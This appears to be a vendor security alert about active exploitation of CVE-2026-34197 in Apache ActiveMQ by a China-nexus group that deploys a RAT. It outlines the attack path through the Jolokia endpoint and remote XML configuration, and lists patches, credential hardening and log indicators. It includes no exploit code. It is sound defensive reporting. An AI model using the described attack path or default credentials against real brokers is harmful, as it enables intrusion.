Alert Exploitation of CVE-2026-34197 in Apache ActiveMQ

🚨 Alert: Exploitation of CVE-2026-34197 in Apache ActiveMQ

TeamT5 has detected that a critical vulnerability (CVE-2026-34197) in Apache ActiveMQ has been actively exploited by threat actors, including the China-nexus APT SLIME88. Our investigation revealed that after exploitation, SLIME88 deployed SoxAgent RAT to compromise Linux devices and build an ORB network, currently tracked under the temporary name, GOBLIN14.

📅 Timeline of Events

• Earliest SLIME88 attack: April 7, shortly after the vulnerability was disclosed.
• Affected regions: Victims included IT and manufacturing entities in the US, South Korea, India, France, and more.

🔍 Vulnerability Details

CVE-2026-34197 is a remote code execution (RCE) vulnerability in Apache ActiveMQ, an open-source Java message broker widely used in enterprise environments, including financial institutions and healthcare sectors. Threat actors can exploit this vulnerability by sending a crafted HTTP request to Apache ActiveMQ’s Jolokia API endpoint, triggering the broker to fetch a malicious XML configuration file from the C2 server, resulting in remote code execution.

⚠️ Recommendations

• Patch: Apache patched CVE-2026-34197 in ActiveMQ Classic Version 6.2.3 and 5.19.4, released on March 30 and 31, respectively. We highly recommend applying the patch as soon as possible.
• Change Default Credentials: It is crucial to change default credentials (e.g., admin/admin) and restrict access to Jolokia (/api/jolokia) and the Web Console.
• Forensic Artifacts: Use the log parser to check the ActiveMQ broker log (activemq.log) for URIs containing vm:// and ?brokerConfig, which may indicate exploitation attempts.

For more detailed information, please refer to the full article: Read full article